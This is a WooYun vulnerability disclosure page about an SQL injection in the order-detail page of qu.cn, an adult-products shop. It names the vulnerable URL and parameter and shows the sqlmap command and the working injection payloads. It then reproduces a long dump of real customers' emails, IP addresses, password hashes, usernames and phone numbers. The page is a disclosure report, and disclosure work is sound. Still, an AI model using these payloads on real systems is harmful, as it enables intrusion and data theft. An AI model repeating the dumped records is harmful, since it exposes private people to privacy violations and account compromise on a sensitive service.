当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123841

漏洞标题:国内知名情趣用品趣网一处SQL注入漏洞(用户隐私泄露不是闹着玩的)

相关厂商:qu.cn

漏洞作者: 小龙

提交时间:2015-07-05 11:51

修复时间:2015-08-19 21:44

公开时间:2015-08-19 21:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-05: 细节已通知厂商并且等待厂商处理中
2015-07-05: 厂商已经确认,细节仅向厂商公开
2015-07-15: 细节向核心白帽子及相关领域专家公开
2015-07-25: 细节向普通白帽子公开
2015-08-04: 细节向实习白帽子公开
2015-08-19: 细节向公众公开

简要描述:

不少开豪车的都已经按耐不住了。。。

详细说明:

情趣商城.png


其APP下载多达3.9万

2.png


本来这些东西都是最个人隐私的了。。。对外公开的话就。。。。

漏洞证明:

http://m.qu.cn/order.php?act=detail&order_sn=2015063022182118031


F:\Python27\sqlmap>sqlmap.py -r C:\1.txt --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150529}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 08:00:25
[08:00:25] [INFO] parsing HTTP request from 'C:\1.txt'
[08:00:26] [INFO] resuming back-end DBMS 'mysql'
[08:00:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: order_sn (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=detail&order_sn=2015063022182118031 AND 1586=1586
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: act=detail&order_sn=2015063022182118031 AND (SELECT 7124 FROM(SELEC
T COUNT(*),CONCAT(0x716a716271,(SELECT (ELT(7124=7124,1))),0x7178787a71,FLOOR(RA
ND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=detail&order_sn=2015063022182118031 AND (SELECT * FROM (SELECT(
SLEEP(5)))QqNq)
---
[08:00:27] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[08:00:27] [INFO] fetching database names
[08:00:27] [INFO] the SQL query used returns 4 entries
[08:00:27] [INFO] resumed: information_schema
[08:00:27] [INFO] resumed: qu_cc
[08:00:27] [INFO] resumed: qu_cc_fx
[08:00:27] [INFO] resumed: test
available databases [4]:
[*] information_schema
[*] qu_cc
[*] qu_cc_fx
[*] test
[08:00:27] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\m.qu.cn'


[08:03:34] [INFO] retrieved:
[08:03:35] [INFO] retrieved: 529899272@qq.com
[08:03:35] [INFO] retrieved: 0
[08:03:35] [INFO] retrieved: 0.00
[08:03:35] [INFO] retrieved:
[08:03:36] [INFO] retrieved: 0
[08:03:36] [INFO] retrieved: 0
[08:03:36] [INFO] retrieved: 0
[08:03:37] [INFO] retrieved: 0
[08:03:37] [INFO] retrieved: 122.227.0.186
[08:03:37] [INFO] retrieved: 1305375707
[08:03:38] [INFO] retrieved: 0000-00-00 00:00:00
[08:03:38] [INFO] retrieved:
[08:03:38] [INFO] retrieved:
[08:03:38] [INFO] retrieved:
[08:03:39] [INFO] retrieved: 0
[08:03:39] [INFO] retrieved:
[08:03:39] [INFO] retrieved:
[08:03:39] [INFO] retrieved: d54d1702ad0f8326224b817c796763c9
[08:03:40] [INFO] retrieved: 0
[08:03:40] [INFO] retrieved:
[08:03:41] [INFO] retrieved:
[08:03:41] [INFO] retrieved: 0
[08:03:41] [INFO] retrieved: 1305375707
[08:03:41] [INFO] retrieved: 0
[08:03:42] [INFO] retrieved: 1
[08:03:42] [INFO] retrieved: 14
[08:03:42] [INFO] retrieved: 0.00
[08:03:43] [INFO] retrieved: dkaadk
[08:03:43] [INFO] retrieved: 0
[08:03:43] [INFO] retrieved:
[08:03:43] [INFO] retrieved: 1
[08:03:44] [INFO] retrieved: 0
[08:03:44] [INFO] retrieved:
[08:03:44] [INFO] retrieved:
[08:03:44] [INFO] retrieved:
[08:03:45] [INFO] retrieved: 0000-00-00
[08:03:45] [INFO] retrieved:
[08:03:45] [INFO] retrieved: 0.00
[08:03:46] [INFO] retrieved:
[08:03:46] [INFO] retrieved: zy123456@qq.com
[08:03:46] [INFO] retrieved: 0
[08:03:46] [INFO] retrieved: 0.00
[08:03:47] [INFO] retrieved:
[08:03:47] [INFO] retrieved: 0
[08:03:47] [INFO] retrieved: 0
[08:03:48] [INFO] retrieved: 0
[08:03:48] [INFO] retrieved: 0
[08:03:48] [INFO] retrieved: 122.227.0.186
[08:03:48] [INFO] retrieved: 1305384239
[08:03:49] [INFO] retrieved: 0000-00-00 00:00:00
[08:03:49] [INFO] retrieved:
[08:03:49] [INFO] retrieved:
[08:03:50] [INFO] retrieved:
[08:03:50] [INFO] retrieved: 0
[08:03:50] [INFO] retrieved:
[08:03:51] [INFO] retrieved:
[08:03:51] [INFO] retrieved: 704a051e3ff0df4e71eb97063405665f
[08:03:51] [INFO] retrieved: 0
[08:03:52] [INFO] retrieved:
[08:03:52] [INFO] retrieved:
[08:03:52] [INFO] retrieved: 0
[08:03:52] [INFO] retrieved: 1305384239
[08:03:53] [INFO] retrieved: 0
[08:03:53] [INFO] retrieved: 1
[08:03:54] [INFO] retrieved: 15
[08:03:54] [INFO] retrieved: 0.00
[08:03:54] [INFO] retrieved: 15173004931
[08:03:54] [INFO] retrieved: 0
[08:03:55] [INFO] retrieved:
[08:03:55] [INFO] retrieved: 1
[08:03:55] [INFO] retrieved: 0
[08:03:56] [INFO] retrieved:
[08:03:56] [INFO] retrieved:
[08:03:56] [INFO] retrieved:
[08:03:56] [INFO] retrieved: 0000-00-00
[08:03:57] [INFO] retrieved:
[08:03:57] [INFO] retrieved: 0.00
[08:03:57] [INFO] retrieved:
[08:03:58] [INFO] retrieved: 537517578@qq.com
[08:03:58] [INFO] retrieved: 0
[08:03:58] [INFO] retrieved: 0.00
[08:03:58] [INFO] retrieved:
[08:03:59] [INFO] retrieved: 0
[08:03:59] [INFO] retrieved: 0
[08:03:59] [INFO] retrieved: 0
[08:04:00] [INFO] retrieved: 0
[08:04:00] [INFO] retrieved: 221.229.86.178
[08:04:00] [INFO] retrieved: 1305391160
[08:04:01] [INFO] retrieved: 0000-00-00 00:00:00
[08:04:01] [INFO] retrieved:
[08:04:01] [INFO] retrieved:
[08:04:01] [INFO] retrieved:
[08:04:02] [INFO] retrieved: 0
[08:04:02] [INFO] retrieved:
[08:04:02] [INFO] retrieved:
[08:04:02] [INFO] retrieved: 4fb4ec774149f7b2e531e8f9d972604d
[08:04:03] [INFO] retrieved: 0
[08:04:03] [INFO] retrieved:
[08:04:03] [INFO] retrieved:
[08:04:04] [INFO] retrieved: 0
[08:04:04] [INFO] retrieved: 1305391160
[08:04:04] [INFO] retrieved: 0
[08:04:04] [INFO] retrieved: 1
[08:04:05] [INFO] retrieved: 16
[08:04:05] [INFO] retrieved: 0.00
[08:04:05] [INFO] retrieved: qq537517578
[08:04:06] [INFO] retrieved: 0
[08:04:06] [INFO] retrieved:
[08:04:06] [INFO] retrieved: 1
[08:04:06] [INFO] retrieved: 8713944
[08:04:07] [INFO] retrieved:
[08:04:07] [INFO] retrieved:
[08:04:07] [INFO] retrieved:
[08:04:08] [INFO] retrieved: 0000-00-00
[08:04:08] [INFO] retrieved:
[08:04:08] [INFO] retrieved: 0.00
[08:04:09] [INFO] retrieved: 9383
[08:04:09] [INFO] retrieved: 326367223@qq.com
[08:04:09] [INFO] retrieved: 0
[08:04:09] [INFO] retrieved: 0.00
[08:04:10] [INFO] retrieved:
[08:04:10] [INFO] retrieved: 0
[08:04:10] [INFO] retrieved: 0
[08:04:11] [INFO] retrieved: 0
[08:04:11] [INFO] retrieved: 3
[08:04:11] [INFO] retrieved: 113.204.53.99
[08:04:11] [INFO] retrieved: 1390444758
[08:04:12] [INFO] retrieved: 0000-00-00 00:00:00
[08:04:12] [INFO] retrieved:
[08:04:12] [INFO] retrieved:
[08:04:13] [INFO] retrieved:
[08:04:13] [INFO] retrieved: 0
[08:04:13] [INFO] retrieved:
[08:04:13] [INFO] retrieved:
[08:04:14] [INFO] retrieved: 94b14ce5b76cfa1552a192cecb97e3ae
[08:04:14] [INFO] retrieved: 0
[08:04:14] [INFO] retrieved:
[08:04:15] [INFO] retrieved:
[08:04:15] [INFO] retrieved: 0
[08:04:15] [INFO] retrieved: 1305449145
[08:04:15] [INFO] retrieved: 0
[08:04:16] [INFO] retrieved: 1
[08:04:16] [INFO] retrieved: 17
[08:04:16] [INFO] retrieved: 0.00
[08:04:17] [INFO] retrieved: wwm89888
[08:04:17] [INFO] retrieved: 0
[08:04:17] [INFO] retrieved:
[08:04:17] [INFO] retrieved: 534
[08:04:18] [INFO] retrieved: 0
[08:04:18] [INFO] retrieved:
[08:04:18] [INFO] retrieved:
[08:04:19] [INFO] retrieved:
[08:04:19] [INFO] retrieved: 0000-00-00
[08:04:19] [INFO] retrieved:
[08:04:20] [INFO] retrieved: 0.00
[08:04:20] [INFO] retrieved:
[08:04:20] [INFO] retrieved: 1261489024@qq.com
[08:04:20] [INFO] retrieved: 0
[08:04:21] [INFO] retrieved: 0.00
[08:04:21] [INFO] retrieved:
[08:04:21] [INFO] retrieved: 0
[08:04:22] [INFO] retrieved: 0
[08:04:22] [INFO] retrieved: 0
[08:04:22] [INFO] retrieved: 0
[08:04:22] [INFO] retrieved: 119.1.212.59
[08:04:23] [INFO] retrieved: 1305457514
[08:04:23] [INFO] retrieved: 0000-00-00 00:00:00
[08:04:23] [INFO] retrieved:
[08:04:24] [INFO] retrieved:
[08:04:24] [INFO] retrieved:
[08:04:24] [INFO] retrieved: 0
[08:04:24] [INFO] retrieved:
[08:04:25] [INFO] retrieved:
[08:04:25] [INFO] retrieved: e0090f136f993b7d03074fe4e93e16ea
[08:04:25] [INFO] retrieved: 0
[08:04:26] [INFO] retrieved:
[08:04:26] [INFO] retrieved:
[08:04:26] [INFO] retrieved: 0
[08:04:26] [INFO] retrieved: 1305457514
[08:04:27] [INFO] retrieved: 0
[08:04:28] [INFO] retrieved: 1
[08:04:28] [INFO] retrieved: 18
[08:04:28] [INFO] retrieved: 0.00
[08:04:28] [INFO] retrieved: 1261489024
[08:04:29] [INFO] retrieved: 0
[08:04:29] [INFO] retrieved:
[08:04:29] [INFO] retrieved: 1
[08:04:30] [INFO] retrieved: 0
[08:04:30] [INFO] retrieved:
[08:04:30] [INFO] retrieved:
[08:04:30] [INFO] retrieved:
[08:04:31] [INFO] retrieved: 0000-00-00
[08:04:31] [INFO] retrieved:
[08:04:31] [INFO] retrieved: 0.00
[08:04:32] [INFO] retrieved:
[08:04:32] [INFO] retrieved: huigui01@126.com
[08:04:32] [INFO] retrieved: 0
[08:04:32] [INFO] retrieved: 0.00
[08:04:33] [INFO] retrieved:
[08:04:33] [INFO] retrieved: 0
[08:04:33] [INFO] retrieved: 0
[08:04:34] [INFO] retrieved: 0
[08:04:34] [INFO] retrieved: 0
[08:04:34] [INFO] retrieved:
[08:04:34] [INFO] retrieved: 0
[08:04:35] [INFO] retrieved: 0000-00-00 00:00:00
[08:04:35] [INFO] retrieved:
[08:04:36] [INFO] retrieved:
[08:04:36] [INFO] retrieved:
[08:04:36] [INFO] retrieved: 0
[08:04:37] [INFO] retrieved:
[08:04:37] [INFO] retrieved:
[08:04:37] [INFO] retrieved: fa7c65f607c5d20f09731ae7dfe5d81b
[08:04:38] [INFO] retrieved: 0
[08:04:38] [INFO] retrieved:
[08:04:38] [INFO] retrieved:
[08:04:39] [INFO] retrieved: 0
[08:04:39] [INFO] retrieved: 0
[08:04:39] [INFO] retrieved: 0
[08:04:39] [INFO] retrieved: 1
[08:04:40] [INFO] retrieved: 19
[08:04:40] [INFO] retrieved: 0.00
[08:04:40] [INFO] retrieved: 130546651710
[08:04:40] [INFO] retrieved: 0
[08:04:41] [INFO] retrieved:
[08:04:41] [INFO] retrieved: 1
[08:04:41] [INFO] retrieved: 0
[08:04:42] [INFO] retrieved:
[08:04:42] [INFO] retrieved:
[08:04:42] [INFO] retrieved:
[08:04:42] [INFO] retrieved: 0000-00-00
[08:04:43] [INFO] retrieved:
[08:04:43] [INFO] retrieved: 0.00
[08:04:43] [INFO] retrieved:
[08:04:44] [INFO] retrieved: 28322007qq@.com
[08:04:44] [INFO] retrieved: 0
[08:04:44] [INFO] retrieved: 0.00
[08:04:44] [INFO] retrieved:
[08:04:45] [INFO] retrieved: 0
[08:04:45] [INFO] retrieved: 0
[08:04:45] [INFO] retrieved: 0
[08:04:46] [INFO] retrieved: 0
[08:04:46] [INFO] retrieved: 113.82.208.134
[08:04:46] [INFO] retrieved: 1305491393
[08:04:47] [INFO] retrieved: 0000-00-00 00:00:00
[08:04:47] [INFO] retrieved:
[08:04:48] [INFO] retrieved:
[08:04:48] [INFO] retrieved:
[08:04:48] [INFO] retrieved: 0
[08:04:48] [INFO] retrieved:
[08:04:49] [INFO] retrieved:
[08:04:49] [INFO] retrieved: 9c1b8a8eec115e68f7b02dc8e142c1fe
[08:04:49] [INFO] retrieved: 0
[08:04:50] [INFO] retrieved:
[08:04:50] [INFO] retrieved:
[08:04:50] [INFO] retrieved: 0
[08:04:51] [INFO] retrieved: 1305491393
[08:04:51] [INFO] retrieved: 0
[08:04:51] [INFO] retrieved: 1
[08:04:51] [INFO] retrieved: 20
[08:04:52] [INFO] retrieved: 0.00
[08:04:52] [INFO] retrieved: 1150335498
[08:04:52] [INFO] retrieved: 0
[08:04:53] [INFO] retrieved:
[08:04:53] [INFO] retrieved: 1
[08:04:53] [INFO] retrieved: 0
[08:04:53] [INFO] retrieved:
[08:04:54] [INFO] retrieved:
[08:04:54] [INFO] retrieved:
[08:04:54] [INFO] retrieved: 0000-00-00
[08:04:55] [INFO] retrieved:
[08:04:55] [INFO] retrieved: 0.00
[08:04:55] [INFO] retrieved:
[08:04:55] [INFO] retrieved: monman1413@hotmail.com
[08:04:56] [INFO] retrieved: 0
[08:04:56] [INFO] retrieved: 0.00
[08:04:57] [INFO] retrieved:
[08:04:57] [INFO] retrieved: 0
[08:04:57] [INFO] retrieved: 0
[08:04:57] [INFO] retrieved: 0
[08:04:58] [INFO] retrieved: 0
[08:04:58] [INFO] retrieved: 122.227.0.186
[08:04:58] [INFO] retrieved: 1305495418
[08:04:59] [INFO] retrieved: 0000-00-00 00:00:00
[08:04:59] [INFO] retrieved:
[08:04:59] [INFO] retrieved:
[08:04:59] [INFO] retrieved:
[08:05:00] [INFO] retrieved: 0
[08:05:00] [INFO] retrieved:
[08:05:00] [INFO] retrieved:
[08:05:00] [INFO] retrieved: 29a5f80b85588c7e96ffd1c645808b20
[08:05:01] [INFO] retrieved: 0
[08:05:01] [INFO] retrieved:
[08:05:01] [INFO] retrieved:
[08:05:02] [INFO] retrieved: 0
[08:05:02] [INFO] retrieved: 1305495418
[08:05:02] [INFO] retrieved: 0
[08:05:02] [INFO] retrieved: 1


修复方案:

1:过滤注入,把'转换成 单撇号/

版权声明:转载请注明来源 小龙@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-05 21:43

厂商回复:

感谢提供漏洞详情

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-01 14:13 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。你最近很喜欢搞这类网站啊

  2. 2015-07-01 18:26 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @px1624 学姿势啊。。庞总传授几招啊

  3. 2015-07-05 00:02 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @px1624 支持庞总,招到司机了吗??

  4. 2015-07-05 00:48 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @wefgod 呵呵,还司机?庞总最近在闷声做大事呢,我不会透漏消息给你的,哈哈,庞总用的可是外星人笔记本

  5. 2015-07-05 11:55 | 随随意意 ( 普通白帽子 | Rank:160 漏洞数:35 | 我对XSS并非真爱(┬_┬)最近有人冒充该...)

    ST小龙?

  6. 2015-07-05 11:56 | 带头大哥 ( 普通白帽子 | Rank:257 漏洞数:81 | 很早前,我就有个梦想。哪一天能站在国家会...)

    666

  7. 2015-07-05 12:00 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    我去,小厂商变大厂商了- -意想不到。。。

  8. 2015-07-05 12:37 | pyphrb ( 实习白帽子 | Rank:47 漏洞数:6 | ...........................................)

    是不是深夜,难眠啊,你的妹子呢

  9. 2015-07-05 12:56 | 随随意意 ( 普通白帽子 | Rank:160 漏洞数:35 | 我对XSS并非真爱(┬_┬)最近有人冒充该...)

    @pyphrb 这是群里那个?

  10. 2015-07-05 14:57 | pyphrb ( 实习白帽子 | Rank:47 漏洞数:6 | ...........................................)

    @随随意意 不是群里的

  11. 2015-07-06 01:27 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @鸿巨科技有限公司 才给8分啊,囧,这种上万数据都没4分之二的rank。。。你们应该制定下评分标准哈。。

  12. 2015-07-06 08:07 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @小龙 说明用户信息隐私就是闹着玩的,给你8分是看得起你OK?这就是厂商态度,希望还有续集,加油!

  13. 2015-07-06 18:00 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @’‘Nome WooYun: 趣网旗下品酒网一处SQL注入(厂商修复没有一系列的流程导致躺枪) 连续剧,^_^

  14. 2015-07-09 11:54 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @小龙 明白,支持庞总壮大生意

  15. 2015-08-19 22:29 | my强哥 ( 路人 | Rank:17 漏洞数:6 | 一个测试小菜鸟,希望在乌云学到更多的东西...)

    我去第一个人居然是我大绵阳的人..............

  16. 2015-08-20 07:56 | Wooyun第一大屌 ( 路人 | Rank:6 漏洞数:3 )

    厂商没有送小礼品“飞机杯”,”TT“,"韩红版充气娃娃"。 给洞主嘛?

  17. 2015-08-20 15:37 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    ecshop...